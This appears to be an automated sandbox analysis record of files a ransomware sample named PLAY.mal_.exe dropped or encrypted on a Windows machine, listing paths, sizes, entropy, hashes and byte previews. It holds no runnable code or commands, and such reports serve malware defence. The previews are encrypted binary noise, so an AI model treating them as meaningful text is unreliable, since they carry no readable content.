        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\state.rsm.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1912
        Entropy (8bit):7.900022421214923
        Encrypted:false
        SSDEEP:
        MD5:BB8A84CEA92AC2ED098874464BEFA2E1
        SHA1:0359F179708669E7012EC4E63197B829E72D87CB
        SHA-256:A226D5B7738FAD15758F267D6E5679660D67C81D4A5E75429B4AB39801CC87B3
        SHA-512:A76730D899D93F285A4174E5C03C8EE3775060FA0EEFB354DCF79F07B88E38B669AC1EA7BA837198C49A9D13A2B8694B4D6DD9158D2D4D160E1693B98DA57608
        Malicious:false
        Preview:1y.ts.!..;....;@..hP.$b..m...`.i.!1.@&...r9..r....~c...M..@..E2~$....nPI. .*.g6.P^k..a`4.SF...7...A...A.4C.9L......8`..g.W.......yl..H..FQ...A..5"-@.gx..[..\..<..U.V..t.o.n68b.J4........t..`s..6...oh....jB..6..5&b....'".....P.,..`.W...`......N......`jA.>......4aq,C......a\..=......O.y}E.HP.".\4.....o.R.....k_..x...z.W..M..........&..HQ)Sp1T...d.9...~g.%.f..a.........KX.w.*s..qZ..??T......\....k.Gy..C.L.q...._.a$..d.3.R.An..mr...J.+.!....4..i..;.>....B4.F...m.l9..I.N.HV6..L...Q.7..?#Br-...YT>...m..Uq2..bF...y....2....22ip..].2.}k.Z:...#........Y..c.+.;...4o.k.E.cGR..'.-;...9..G)c.X.......h.NW{...~..%Y...C..1.!Ev+.2.F.\...K.W.DO)}...sg4..H........*.Y.-..HM$.v.9......#......-..%......~u...5.qi.|4.\....[e..Jb3.....gD$jh.Dr.p..h...)\.=t..(........@.@G_.4(L.....e..,`....\...m......3.i..C..../DdQ.?Mn ...T..U.|.!.I>.........................._..Zq.L...Sz.d.zC.z..J=c.uH..%..R.z....g.Y. I.^...:U.-#..B;.8....1..-..5.."..r.. ..`I[.N.X..F..5>...b..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOPrivate\UpdateStore\updatestore4df22196-a1f2-426c-aa27-062a9f86aba6.xml.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3688
        Entropy (8bit):7.946328396412271
        Encrypted:false
        SSDEEP:
        MD5:A3053EA397B077DA899CBCA6879C7626
        SHA1:7E33884202BA04508A750C8CA86BD8469CA73481
        SHA-256:2971834C72792189441456CB7B658BBF0C62D938F27D16F112E8DDC2FDB716A5
        SHA-512:FAB91DA6183454058415044DE574A78F2095631F5BB414E2924DBD79031204AA49A30633D55257034B36D43E5A77CF30C9ED080D6C81468FE8115C30A821AF1E
        Malicious:false
        Preview:....6....z..T.].......S.G..)...e.s=n..^4..5u.l/.*.I$...A..y.w.Z.....V]U.......}.......G..u.E...9.*V...]..,..w.N..*xE@.=....g?.BX.M...I...U.I...5./Fy...y.=W.A.9.....KvL....u.......5..`U...[.8.6....U.wZ...\.H-..gV'...;P.s...%..O~T.m..3z.J..< ..Buq.9=.\.5.._S..b.N...0v[..b;.b....7.#]nF...Z.h...#..e.|G....w?..#M....V4it&L..s..Z.`..Xt."w._.ai.y\S..9\.F.v...._,.J0.....".a.@L.....ZD.Y..k.f...~.k.....a....._7..t.O...y.l..Y..F....q8.Xh......P........U..5.G.B..X..o4l.G..1.;..J..".....tkd..Z.....,..5.=.....t..6I[.2-.v.a.y..#<0...[..|......&.D..../.Qs.h....4..d...H...t.p.7..oY..r.o......2.."DS=;6N'..m........E......3.0I..aW.2..l...W...0....%v.<D.../,....!....T..0..q.........k.F@.....G..N..0.T.._"..\!0.{.....G.@pJ&..v....O..b.q.H.R..G...p.S..`...... .A.mF.j.mT....'(.[.6..[.n5.!76S..^"......e...M.O..2..b...c.d."^.....0s|...d......%..Q...AX.i.....0..../;0..M+...]....j. .i..~4j. `.u#.J#.Nw..).{u C@...I.T./Q.}./....g.2.Y..<d...._......*....f.]....

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3624
        Entropy (8bit):7.938624242181407
        Encrypted:false
        SSDEEP:
        MD5:ED046267EC06A42F90C9DAABFF33FB1D
        SHA1:53674604C880E6F1255C2E7440506B0104E839BF
        SHA-256:1ADC353C944AAFC4ABF79A7849D5C39E48E62C63B7B516DFC36692E788093829
        SHA-512:E9833876ACFF92EC1A3296641832BA1E292413C5C21C4A1ABD1B7939C217E323C0D4A941169431D19007E2D5B71A668BA15CF7CAD3D0CAA3B81D9AF0429D006F
        Malicious:false
        Preview:.....8....1..k3..qsk..v.4.9.9w....z2%q..A<n.!B.l.RwTw....VV..-.7.%g..%J\....i..p.>6lSL...P'V31._.....A....3S.......s.fE..,-...A..9?...N"kq.aW....z.?...U.u{..rJo.;..$.e.V.P...5q.....B...K.........b).....-F.4."8........N..w.:?*....L.O....v.9....VW..f....@.Bu..|..}A!.&...Q-n..3f...h.Y...Ez...Q...'.........(.*...8aPr.wFf...4........}....Y.!..l7@...*.D..uz.~@.j5..P.B..........tb=.R..L....04.u...|.!N.`b.....j.0....l.1.j...D..l".n.....tlO..`.m...9@h.3(..%.vj,+f...0N../...[n....Mx.H.......:..... #!../...C..dF`.X(.f.%.+..?......r8V......e..?.\..lRQ.q.jVD...{x..m.2......%Q.....jL..^....U.w...r.&..+...p..@..2..V.x...>..&..R..g.7.8..?.......`.....x....|.q)3...Y ....SXb8..H~......9.9.;!.>..U.I^..?.Y.\..U}..w.<. Z...B.P_.7Ew)..Vyw....Fs...k...c....t.7.....3p.D.OYs-...{.'.NO...U.Z..{..%.'.a..Y.%-.>.pVw.Z....!..!.S....&.\....M.{....=...%.v...nZc...v....3\...y'..(.L.J..?...|.$H...u;M.U.dj.ec.'...4z.....~..O....z......Ss8..p.........#.)+.}....p.X

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\NotifyIcon.001.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.980725541493399
        Encrypted:false
        SSDEEP:
        MD5:AA328C45E04A9F0B811AEDA4AB334E5C
        SHA1:E57651BF461870FA2239935A7458D6A5AED30D14
        SHA-256:8FF61DED44B07C0D3020A3D33AF6BA627E37851FD5B83685E37F8F7C985B2BB7
        SHA-512:902B119FC47333C9E827E71C8FAADBCB6E8EEAD7B8057CB9D1C75A9DC9BBD46B5B8716ABFD5B7F3B4B18558203DF5C3EDBAE86843AE18849FF2355970A658DCC
        Malicious:false
        Preview:.\..!.!.d.J./.a..'.A8'..Ujz.F....n.....>..#...V)....~...[R......\^...B..F.Y...9...!..ev.........A..].....$.Q.u........Ba.pL.h..K.h.....6.{R..#x.%txps...<....C.'4...........\..4..<C.!...p..c|.a...^s-.V..... ...h..S..F..]_.a.(.3......^`FUdm$.U0z...d.0,:.X.5.H..P...z..l...+.......`....cs......@3..q....g....1..{......S^...;..LiR[...sfG.MT|......S...J...<.(.R]&.....s.r8...`.Ew.<N.C....0.3+.3..ia....w.......I.0.i%....F..,o..<...C.3.8........X..}...TI.lW...9..2.Z...(Vg.....0.h...`.T.We.....f... ....`.....Kr..Z~h.N.../`....QUzX......0tgDo_...N..O.V/.?*._T......6..( T...h.k....;w......A#v.|......P..#Q..'PVh..\z..t...Fv...#.. -.....V....g..Ot..u......e......M.z.!..s..B....`..G..-.zz...E.)....#u......y@.ctQ.....a.......J...........U*...Igy.m..t....f..).a..s?.d..M%..>\.aX...{#&.....U.IM..9"&11m3..Pk..BrXH0...t.=W...Q....Te.WtZn....I..C...d$...<..)..;.2c.t..t.|....^.X..b.e8.e....H..nDk..k.-M.c6....=.nPb.M..6...od..udG....>A1|9Rz......N..7.6.K

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\NotifyIcon.002.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.9816423468474635
        Encrypted:false
        SSDEEP:
        MD5:539C9EC8D82572D767DBBA37DDFA8059
        SHA1:A93C565C9C5BD0796E1538295825A2D62CA43BE1
        SHA-256:674E33381D0E0CCBD947A7BF4160BAC0A541737786AB4E6DB565FF609B26BD55
        SHA-512:4A8F678C372BEDB751A586D414FA069EC5CB5A73713FCD8B8F38FE23FB84CB3C867B01150FA05EDA88E654A87A79F803D3B212965EA80EE560F1F12923354E83
        Malicious:false
        Preview:..T.....)S(V...lEw.)/;......1..p.....p...8L.k3[J.BA..0WM....l...tl.m..?].B...MG..b+6.y<..'.Wd+..7qt.q.(.U....1.s...v..3..;...?.dE..&~@...8e..Ao`.5_.G.e....3.`.m....=.5..9.........>.*......1(........1f.6}ux..PBUJc....sM..O2..'/.....Z./+$....vG.'......-....G.j...F|..I......Vl.6....Zr....j)x.!.~....4..].c.=j.H.-=\.8..+..."F.q.=.\..2.&...6.-s..^-.S........"-.E.c.TR...P.T.-...=n.....r.Y...<..j.eCyg.*9.W.8.I.<.Oj.D!.t..+}...e.h...........U...r<.4N...o$..M.(+.-7.9..oW.E..!>........... .(.G{...4&...}7r....x.ie.......:..c...c.!...:....<.,..7(dWd.t..I.tiOC.7.3X....{@$..n......&9..`.y.e..0....i..E}=O...G.d.^.Tr.#..P.....P..[^=.t..v......|a..}M..'....Z.....=......(y.0i...\W..M..@>..G.HNi..'K.V..?.cYUO.V......\./.~u.&*!..8-@{*.'d.o.}.....u7!.V.&....4....:AS.|..V.. ...h....?.....tV...f..h.:<...$\^.....J.P.jD...e..........o..-.A......x.=....g....../Gr.6., ...*$.9.<.g...'..I.C.s..YV ........fo....Z.*.F.U...Ox...mU....W)q....U. ......'....*<.....g..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\NotifyIcon_Temp.1.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.9809322588283385
        Encrypted:false
        SSDEEP:
        MD5:874C20768D07C1259FFCF88ACAD00185
        SHA1:7EF2C0C5D60408E1E86634804363EC9A2F7EB3E2
        SHA-256:7D297C088FDB48CB6F43335FD991A9F4E4D89D2DD97146411E605CFD6F091C37
        SHA-512:0F1A6125045521FC7C148E42C149F7A785B6ABE3FCC5DD81CF7AE0717CB743EBED0548A37EA0EF60EF63099E2689BBEB7E2DB4A1561983CBDCE424E644C5B0D1
        Malicious:false
        Preview:J.^Q.3O<.*T.A.?.Zaz.n.eO[.G#.}....Q....M..f...F.sq..!h....W.....|.u.0.&.[c....wp.....3.^-J.....h...*.;kY5):.[..o...s..?...[...l..`..)H)...g......&6..o.|(o....Y....ff..W|......\...G6P..HEMj<..........%F.(.9.Y..).7.....q.......p.X.M9y.=9[.{......*n+b....[N9).~.4[.........Ib..J.=`p..e.A.<.aJ{e.z...u..s..lCx.ke9S..2Mc4Vy$..Ug...)....tK-..".. .~.f..142...[6.....yD.]..6..F:..........;W.[>..~E....4NW...+.9-..T$.L.&.........lmWN....Y./....cw0*.._..t.....Z....?Q.../..#..Q.<..k...L..J.....s\g<xyS...........!.0.9......%4.J..W......f..$.^t.1,)q^..;5..G........G......x.....f..5.=....x...~Nv0.6...s.......g...a'z...q...4i.A.0R;.(.+./.8.#.T....Tp....D.)...J...5..._...{...Jc..H.+.<v.4..c$.O..).i..U..O..x..g....Q...C...g... ...ni..P..../..X........V~.C..h..O3..~....a...vw..~.8...o....F...........9.......cy.wz.u..yHS......1..c...T..].^........l.....;..<.m.F.3.a(..S.$.y}.&...[L.rXW....'.<;`.O.....u....YFY.&....^..M.4.j.].m]%d._.....!.;K{.`.Gu}~...'s.6w]OL

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.001.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):29752
        Entropy (8bit):7.993326689991698
        Encrypted:true
        SSDEEP:
        MD5:4C0EAF881DF7DC6FBAECA2847ECC70C6
        SHA1:67A4618C96EE61FB3B781B4E6E0CB03F222B2F3B
        SHA-256:E6B104687943C133F7B69DA46C2936A760164CD0CD4352BD523144A98E12313E
        SHA-512:BAB62ACFB746A75403C159370B07EA377F0E59E336D0ABBFD17AD4F3EAAC02A4D1B0CAB770EE8FA51ED95A413F9F7F79F5E56722332395FBA8F1E73376B6FB63
        Malicious:true
        Preview:.P:.).Rj).......i.0.ek.dkW.....%....$.k..Zs..Jo.[8z.K0.Dt.e....BR.V.......X. .S.I.<.6....t...G...7%#.e...8..[0......;h.....In..X....C..mFf.|...#.*...*PB.kl8.kl^.x. .../.\....^~X....g..uG......Mp....`.....'bxhsBx..."..x.....r...c.WC..?....^.J._....?.R....=g.`73....k.L._4.....w(CSyf~..[...2f...............>....bR.i........d..Q..g.u..z...v.TC.D..I+....wD..J.N.w.tEm...%..c.i..EF...>.K..7.\..:<(.G.{~..|..e..kM...^_o...}@6.v.q!..%.........#BKd..@b..B,....I.$....].n....8S..^...h2.XZO~5s..+.I..T.w..G....u..Jy;=....=*.;..s...0....=rgE...o.F.C..bJ*@..H..m..q......*.-\+..".....|....]....k........i.6j....w...&.P.J...3.IO..........iH...8...(.X.uyTv.U.Y..M..... ..E..vD........'.t7n........b...'M.<..TM.4...M.'...~.P...M.]....7v.6m(...n;.O.#.k.>Dpe.8....-..8.-.{.8..e<cQ.I]..E.:......'..Z.g..fWq.-U.....FN..9.../.p.n.L.../k.."..!c[.......z.._D.0vm.....l.>..o.&..ur>8.SY...I....[...-.....x......I.9{.C..5.F......'....5$b.?..6..k...Y..cU.....D..*a.QJ^l....

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.002.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):29752
        Entropy (8bit):7.994365177765801
        Encrypted:true
        SSDEEP:
        MD5:EED8F29575A0047243E4F3F4C73C3CC0
        SHA1:55CB66C472CBB0B095773906923CBEF9F65D9575
        SHA-256:2AFC7C3419E457D2819D32BFA1006C43117076631F46CE07EA48B664BE694CA6
        SHA-512:C6B0AA8F76C68C7BBBE92BF7D77E56558683C91EDCD7F2BB62CA7BD70C5BA46A7D8CC67FEBA22A05D788410F30BBCA95E9D441199D3D2FDE537E2205E34232F4
        Malicious:true
        Preview:....n...H\.r...c.......=..O..oG.v...|....g.%|8.Z....(..^.|...x...\..1 ..\]^.I.....He.(..#....L.'9.M.........n4RC.^.%E..5V\L.{.FN.g.>.q9.t....pfx.>'.....J._.e.9.....@..Y.2..jo.."l...p.......$.._......."...N._r:.K.m_..z.5..)h..g.^..+...K.\......a....L.~k;e.2i..R.0.^..w.....~"fM1..W...h...N..6..".s.{.o.\..$..G4.;LF........Y...K/.9.S....i\$.!v..F.bap%5.^...k../.2.Fb(.p..U|5y.Y6.....6.*.......3..=.8[}tc.P%.4.GM.F[..r.Y.9...3.Qo.K.h.:.....Ku.'.....k<.Z..o{...$.R5. `X.,1.P[.+..Y.%.\.l...0..\.V.F7....z....Og..gfl[.E.....dn.e/f|.V...4..d..xN.>-...e q..SQ.......l.}p..}...........Z.`L...a;....j...m..9...v"..-.Gj}.! ..d..Es.T.X..e.{....zv.r|\9....RN..:9..#8.........z....O............C.].gl."...T..:L.....byz...\+..\..b)1>..B..Pb..-.^.br".j.......#O.....i.<./#....2!.9..ck..>..(...}5$3a..5....qm...O...D.m.l~.k...."....K.....~.}...Z......{... [.}.7\......-0it..V..\m>gL..[.............*t.......8.{:....#.$.n$J.G...p..z.0..n.5.........pfDi.........8..tC".....7..I!..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.003.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.9610312245553585
        Encrypted:false
        SSDEEP:
        MD5:4389EC813692362AE41741C867D4DFCF
        SHA1:0178BB251F806C03BD4106BE393CC60B57A5E2F3
        SHA-256:70C6604C4DC2A774ACBE7BC0A9F31F85810088796A4C10186B06E78F9C1F9459
        SHA-512:520DAFED32171BD8B9A6973E3537BE115E3430F9E428E4FEBCF15C9960018C52E86251FD9F9433007F73C3E4A8BEB6C4EA73C1B8E99F4ADB238ED1BE5727B32A
        Malicious:false
        Preview:..0>_{.....QI..`J.....B.M.y|.JJ/.G..f...G!R.K]...x.*jq.....7.ansp.b*Fe.$^>.`.]M%....)..)..C&....%...q..sp..5..s..I....&.8..o....@.jY.e.X.qo ._.)...!*{.M...I......1....A......9...2..?=...O..\..J..n.+..D.#.....`@...R*....cc">.6.!Cp......#V..r.z. .'..Cdqr\.qox.5kVk.~N..W-{.A.. ~..._..+...u.P..a.cF.;k..OZ..`...8.3PW..'..sv.a.Y,.'.A.Sv... ]!....o..$....6..z.1l.{*..H .0\.e/.`....(.6..J..B.+2iZ.X.O...WV.../..............e|"U...I.[..I.W&B$T....T=@.q...n|..?..KI..R\{../.*.@my}.d.;(./..`.PEc.....W.~..WP..d..,.J..!.v.ma...l...n.>...U.Nv4..hj<.&.y.-..^,.....@*.0.(_m......;...g....s....cS.....f.....HDY.C....'..L..V=..oS.[b......8..z<.B..Qw....Q.N..F..)./d..n...+...W.(..,...K..!...2u6A.......h...Mw.h..A.+.`L....j...`0!..@3....4'..AH...m7(.x...X.4..+;Sf..A..Q..sw...|....v.1.r..{........@..:hS..sk.{..I.z..9..T..K..h./(...q.....$ .L...uL.....1....J?h..R."....#..m.$.`.../.Q.....iO..:,.Sz....7....{.f.h....4.Y...~.."....e..1|.r...YI..4..bZ.i.e.K....R.A^...!...y..;

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.004.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):21560
        Entropy (8bit):7.992318893173812
        Encrypted:true
        SSDEEP:
        MD5:3A1C75D2ACE5BDDE11B70FE319DE6C3C
        SHA1:17D7BD87F13F8DE51AAE9A90F4390AEFBBC788CA
        SHA-256:CD923BA463DB592A8AA8BF8DAED499330BC6EC98C9AE0F3A59FCA78C296CE058
        SHA-512:11981AE0A80F9CF286B67413AD8446DDB944BFBA2D8EC395CD181BC773C3FB9415B79C2F0E773CAB2A1AA2D173681A1D0660BC5DB6BA88BC136AA324485193DF
        Malicious:true
        Preview:w..].~.Nwe...?....r^...m$.d;.k..c..(.[oS......dQ..h..`9s.\....=h..C...@I-#e..~.......?=1..X.S.....)K.x.er....J.f..~.VB..Q...`....r.......m...x.....c..B....9.....z..6.].X.!9...1....:..["I}...P...'......W..Y.g3/..S...|...-Y.....Gx...B.G.`j}.C ..Z.......qK.\....g.....ji%...~8HG.G...8...,. ..A..M...x1..@?.knp....-|...=(.E.........3..w.M......e...D.^..4..cC.....-..t4v.?.e.......^Bz..am.4.i.F.R~Qhv.....Q.........#{Ku..>ut..B)....Q]y...*.j.|......i'V.......|....sD..sWJR....ux.9A..s}!...;.^M.X.eeVc.....k<.c..[...E..@....A..<../..<..&'j(.....=.8y..k).\..\d..;34_[?./..{Q...&...M<.P].){.....&Lr.z..c.r.)...dC@...:....... /.".e.E...TO..o.....r....h...o7.'<U../....U....G..2.vX.*.8...;h...b........B.....Ez....g}_q.J..;.b..\.k3.!._./.t....q...S;..1.7.4 .....*...$.a.e.H...[U.Z.*:d4..7.(.5.B.u....V.$..|uuR..<|..n.......<.M.=.t....j....&.E.JX..!o..<....s..[../k..<.u@.|...]C..a...../....yM.&..`{...B.....R.<.........6.#2..x...._.^.a...z.q.Q.$z.k..#.F.:..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.005.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):21560
        Entropy (8bit):7.991158700155983
        Encrypted:true
        SSDEEP:
        MD5:CC8CE47F39D0B085A17380BC120534DD
        SHA1:4D2FE10B930E2CD4BE119A29C9890D22D35AFD34
        SHA-256:B23FE4723CC3902B4218C323AE590643767099F30E677D4B3BB304FED2437BE8
        SHA-512:C4178097A57E46D436A8EBB32EB259A363BBF985A97DB2F94715917F2C78FEED5014EFA1A5861F4FD008B40AD7BEF9DFE0C951B6B88C206B4109AA373DA702B4
        Malicious:true
        Preview:5.....d\...\.|.c...Q=.,.9.n..9b........^M..j.>.......8..Ql..[0..C,S....%&.T6.v...;...?.`O.U.g...i.#.z5...g..w...t..i.....#..6..h..)..Lp...>./...u....,-..J..+a..Ee.....@..S..a.V.Ivf.t.W..FN.3...T4..`........5z..Z.z.!.:...a.fiL<R.....4.-A.O...C.yw....l.'x>..`..bq.._....h.........>*..Aq.*.d.~..4.C^..p1GY..X..v.9....W.E_..^.h...VII..b.r......bb8|..#*PW`...D....{.=).Q...#...'+T[...)......a.c.L..`P..V.U.K...0A.u4...J...'>HL"p...+.W.'{.X%...n~..;4.<L...L..n.b...Z./}p.c....<.o!.O2.._uhr^.........!.^20K....H.IAP..:.b......5...r,Z.7..H....vD._7.U..qx.......qL(...3.....z.A@..J..&.b...y.l.T....a.'....M....D........T#.X4;....Y......,W...e.s.V^.8..=,...7.....B...R.e.@...&hz..k.?2.....=`j.E....e.Q.#J........H.....]i ./.Q...y....W...G<@7......Z=b.,?..|FI.T...-.Oy@H.TP).....P..9.O..........&z...Kh..p$.3.td.aD.Eg..+..`l..=.!......?A[.d]pB.w...[.W.._I.q{.GJ......k..%....b.......'A.45=.l..t!;[Zu...D....o..%<...q.2.1.G].k..%.."G....uR...Z....C.*..dly....z

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.006.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.9804445165456315
        Encrypted:false
        SSDEEP:
        MD5:7FF4FBC1AA65635868D53D1753A7E891
        SHA1:78A953185602A7A2A5E3F8F25104A9826E88F3B1
        SHA-256:3B607D13A48D3603D6B09E64903F5347920811EA6C525490123A428E0AAF20CE
        SHA-512:1D4B50B325DB37FBFD40374448BBE16CE93038BE741F9A748A3104ECCA1FC9D39A4EE7AB6138CC2ACA2B07A59E88C6EEAD92ABFF409996AB72EAE70396E757BD
        Malicious:false
        Preview:p.$.@-..2...B..~<..;.Pk..sK=r.........4.)}..b/...cZ\.o...0.87. o..].k....O.&J....Ew.....9[.gY.]..Qw5....a...<?._.g..@<.]...S.<...H#F..T..(<P.T..WQ..0.`..z....f.....(.~g..0....J.,#.......&..2.z..[+.....Z...h.....@...By..iu`6./.p..97D........B.sb.4h...F.C..H....hD.......K....BS...`47.....#2....b..{.&.....G...>*:.h.Ep:.."B.t.8....$6<.<=]....F,..ne..e+.$.bc..K.\..}_{.9..I.zA._.=.f [.~.@b{.O.m0+.x.i.(.{1.^_...,..-.n.f".r.@...A.^..\bR......V1.j.#C...H..,..'w.X%..O........Q..o]"^........$..\.-.H....l.Q.....~...5.r1.}...k.2F.....w..YJ..fy..o\ze..........Z.....x))-.....U....|...%..dc....od....-...`...y...8%..<?..m[..Y.[tV....*,.9...#_^.......=..{......u...zI.\ .WxKT...........'..V3.]C/.%...B.p.T].J.....z..UO...r.!.3.....+..5...C....k.GR..:..7oV.rB.jg.q?....*:..o...VR#..E.9.r....(t.2.a....U....Qi...y....Dn.."n3.5`..8....A.)."t%1b.i...{.+{|'...(....../...C....h1...zav.~y>a.).......a.Uh..".......^.U.'S......."XaC."..c......WEvs..H...y.v$r..Y.w...i....v5

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.007.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.960910436974693
        Encrypted:false
        SSDEEP:
        MD5:9E3CA34E7ADCEDF5EC9FD3E90D920848
        SHA1:F7950BC296CBAFBB784D7996FFA790B1B5E80667
        SHA-256:85109D158A6A714E4830ED71BE13EC449338D1928D56997AA799D3F3874E0156
        SHA-512:1FEBF9328DD6A361DB8B8039315C56B56469D59A67ACC8877B93B3A74B52A127E003A9981FEEA9736B0CCD38FE4ABB20B939E9E494B720AF56EAE1CA1E8CC8E5
        Malicious:false
        Preview:|y0..+...qeQ.u.3..E..]....z.@.s...Wp:.n.g.e....1.m......46}\+....-.O).....f.\.....F.[M...`...B.V-..|..6.(.'O|..y..T.Q.Y.....}.T...._Lu...B.|M..0..2.B.F2xa^o...U.q.0v...1.?..s3..?...m,k...Uk..B...s..n.1.R.....+.HWCmW/..0.......(.v{...G.?.6..+g..*Y....p...F...s......H.,X......"n.y0...jk...v^0.*qeQrQ.`.M...c3.t.c...DNq^.}..+....:.K....}.G...*.?.zSv.(<.c.9..p;.vY......5..}......8.[....&.;t.^y...5...ekDH....E.A..rVjw."7~..........".....u........y...nVF.{..WL...oU.EC..~..{....J..6.0..P.y..i....E....K.....&..:.[..O.....P..X......H4b.p.w.Z.Pu.C6......r..S ..S.y......q...j..h4.....@.......\t......6......S4...h... ?....2.J_^.}.|7.Zv......^..=..z.G........?..a....l..b0..-!._n`..T..w..`/..Q2..E..6..Ef{_y.]..R.L!.`^.0.$..R..1=tC.*."*&.dj{.. ........'PJv..i}.0....~. .......m.*At..`..<FAN..vIq..IO.GM..K..b{.L0...........5..E[R...ey..3..=D^y.w..B..~N{.}l..N......^.ab......l.y_p_,....L0....$"?.S.a=R. ......G...?>%.<.O...S.U...tYCt.........v...p....b.

